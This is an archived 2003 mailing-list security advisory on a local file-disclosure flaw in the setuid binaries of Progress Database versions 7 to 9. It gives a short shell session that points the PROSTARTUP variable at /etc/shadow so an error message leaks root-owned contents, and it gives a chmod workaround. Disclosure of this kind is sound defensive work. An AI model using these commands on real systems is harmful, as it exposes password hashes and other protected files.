|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
SRT2003-04-02-1735 - Progress PROSTARTUP root owned file read
From: KF (dotslash
snosoft.com)
Date: Wed Apr 02 2003 - 11:28:19 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This data can be found at http://www.secnetops.biz/research
-KF
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team researchsecnetops.com
Team Lead Contact kfsecnetops.com
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
************************************************************************
Advisory Number : SRT2003-04-02-1735
Product : Progress Database
Version : Versions 7 to 9
Vendor : progress.com
Class : local
Criticality : Medium to Low
Operating System(s) : Linux, SunOS, SCO, TRU64, *nix
High Level Explination
************************************************************************
High Level Description : Error messages can provide root owned data
What to do : chmod -s all suid binaries in /usr/dlc
Technical Details
************************************************************************
Proof Of Concept Status : No PoC is needed.
Low Level Description :
The Progress Database reads configuration files as the root user. No
checks are made to verify that the user running thr program has the
permission to read the configuration file. A user can simply specify
a root owned file and cause an error message to be generated to view
the file contents. Most versions beyond v6 appear to be affected.
An example variable that can be abused is the PROSTARTUP variable.
bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)
bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs
bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)
Luckily on the machine I chose to exploit the line that was read from the
shadow file did not have an encrypted hash. This however is not always
the case.
Patch or Workaround : chmod -s all suid binaries in the $DLC folder
Vendor Status : vendor has been notified and is working on a fix
Bugtraq URL : to be assigned
------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact researchsecnetops.com for information on how
to obtain exploit information.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]